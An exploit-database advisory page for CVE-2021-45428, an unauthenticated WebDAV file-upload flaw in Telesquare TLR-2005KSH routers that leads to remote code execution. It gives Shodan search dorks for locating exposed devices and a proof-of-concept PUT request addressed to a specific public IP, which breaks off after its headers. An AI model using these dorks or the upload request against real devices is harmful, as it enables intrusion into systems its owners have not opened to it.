TLR-2005KSH - Arbitrary File Upload

vendor:

TLR-2021

by:

Ahmed Alroky

9.8

CVSS

CRITICAL

Arbitrary File Upload

Unknown

CWE

Product Name: TLR-2021

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: Unknown

Related CWE: CVE-2021-45428

CPE: Unknown

Metasploit:

Other Scripts:

Tags: cve,cve2021,telesquare,intrusive,fileupload,packetstorm

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing, http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html, https://nvd.nist.gov/vuln/detail/CVE-2021-45428

Nuclei Metadata: {'max-request': 3, 'shodan-query': 'http.html:"TLR-2005KSH"', 'verified': True, 'vendor': 'telesquare', 'product': 'tlr-2005ksh_firmware'}

Platforms Tested: Windows

2022

TLR-2005KSH – Arbitrary File Upload

Due to the Via WebDAV (Web Distributed Authoring and Versioning), on the remote server,telesquare TLR-2021 allows unauthorized users to upload any file(e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes remote code execution as well. Due to the WebDAV, it is possible to upload the arbitrary file utilizing the PUT method.

Mitigation:

Unknown

Source

Exploit-DB raw data:

# Exploit Title: TLR-2005KSH - Arbitrary File Upload
# Date: 2022-05-11
# Shodan Dork: title:"Login to TLR-2021"
# Exploit Author: Ahmed Alroky
# Author Company : Aiactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# Tested on: Windows
# CVE: CVE-2021-45428

# Vulnerability Description
# Due to the Via WebDAV (Web Distributed Authoring and Versioning),
# on the remote server,telesquare TLR-2021 allows unauthorized users to upload
# any file(e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes
# remote code execution as well.
# Due to the WebDAV, it is possible to upload the arbitrary
# file utilizing the PUT method.

# Proof-of-Concept
# Request


PUT /l6f3jd6cbf.txt HTTP/1.1
Host: 223.62.114.233:8081<http://223.62.114.233:8081/>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Connection: close
Content-Length: 10